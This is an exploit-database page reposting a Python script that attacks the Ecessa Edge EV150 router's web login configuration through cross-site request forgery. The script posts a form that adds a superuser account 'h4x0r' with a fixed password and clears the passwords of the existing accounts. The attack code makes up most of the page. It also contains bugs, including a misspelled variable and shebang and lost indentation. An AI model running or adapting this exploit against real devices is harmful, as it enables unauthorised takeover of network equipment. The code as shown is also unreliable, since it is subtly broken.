Ecessa Edge EV150 CrossSiteRequestForgery(Add Superuser)
CVE
Category
Price
Severity
N/A
CWE-352
N/A
N/A
Author
Risk
Exploitation Type
Date
N/A
High
Remote
2019-03-26
CPE
cpe:cpe:/a:ecessa:edge_ev150
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030217 Below is a copy:
Ecessa Edge EV150 CrossSiteRequestForgery(Add Superuser) #!/usr/bin/pythono
#Exploit Title:
#Date: 3/25/2019
#Exploit Author: BehzaDghat
#Version: 10.7.4
#CVE : 2018-13032
import sys
import requests
au='/cgi-bin/pl_web.cgi/util_configlogin_act'
def help_message():
print """
{} -h ---> show this message
{} -u URL ---> start exploit
example: {} -u http://target.com
""".format(sys.argv[0],sys.argv[0],sys.argv[0])
def error_optiont():
print """\ntype and enter {} -h""".format(sys.argv[0])
data_fs={'savecrtcfg':'checked','user_username1':'root','user_enabled1':'on','user_passwd1':'','user_passwd_verify1':'',
'user_delete1':'','user_username2r':'admin','user_passwd2':'','user_passwd_verify2':'','user_delete2':'',
'user_username3':'user','user_enabled3':'on','user_passwd3':'','user_passwd_verify3':'','user_delete3':'',
'user_username4':'h4x0r','user_enabled4':'on','user_superuser4':'on','user_passwd4':'123123','user_passwd_verify4':'123123',
'page':'util_configlogin','val_requested_page':'user_accounts','savecrtcfg':'checked'
,'page_uuid':'3e2774f9-1cd3-4d36-a91e-eb9e42b5ba0d',
'form_has_changed':'1','submit':'Supersize!'}
if len(sys.argv)>1 and sys.argv[1]=='-h':
help_message()
exit()
elif len(sys.argv)==3 and sys.argv[1]=='-u':
urlt=sys.argv[2]+au
if '200' in str(requests.get(urlt)):
print 'Send DATA'
r=requests.post(urtl,data=data_fs)
if '200' in str(r):
print 'Added User'
else:
print 'Not Found Page'
else:
print 'Type And Enter -> python {} -h'.format(sys.argv[0])
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum